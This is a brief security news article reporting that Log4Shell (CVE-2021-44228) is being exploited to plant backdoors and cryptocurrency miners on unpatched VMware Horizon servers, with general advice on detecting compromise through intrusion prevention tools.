The Log4Shell vulnerability is being actively exploited to deliver backdoors and cryptocurrency miners to vulnerable VMware Horizon servers.
On Tuesday, Sophos cybersecurity researchers said the attacks were first detected in mid-January and are ongoing. Not only are backdoors and cryptocurrency miners being deployed, but in addition, scripts are used to gather and steal device information.
Log4Shell is a critical vulnerability in Apache Log4J Java logging library. The unauthenticated remote code execution (RCE) vulnerability was made public in December 2021 and is tracked as CVE-2021-44228 with a CVSS score of 10.0.
Researchers have warned that Log4Shell is likely to continue for years, especially considering the bug's simple exploitation. Proof of concept codes was released shortly after the bug's disclosure, making it very easy for anyone with a modest skill set to exploit the vulnerabilities. Several incomplete patches were released, making it somewhat difficult for teams to patch vulnerable systems effectively. Instead, some organizations chose to apply mitigation measures in conjunction with patching. According to Sophos, the latest Log4Shell attacks targeted unpatched VMware Horizon servers with three different backdoors and four cryptocurrency miners.
It can be difficult for companies to identify systems that have been compromised by threat actors who leveraged vulnerable instances of Log4j. Companies must utilize as many tools as possible to detect these threats. This can include the use of host-intrusion and network preventions systems. There are rules that can be used to detect malicious network traffic and halt communications upon discovery.
For a good example and further reading please see: “Log4Shell - Detecting Log4j 2 RCE Using Splunk”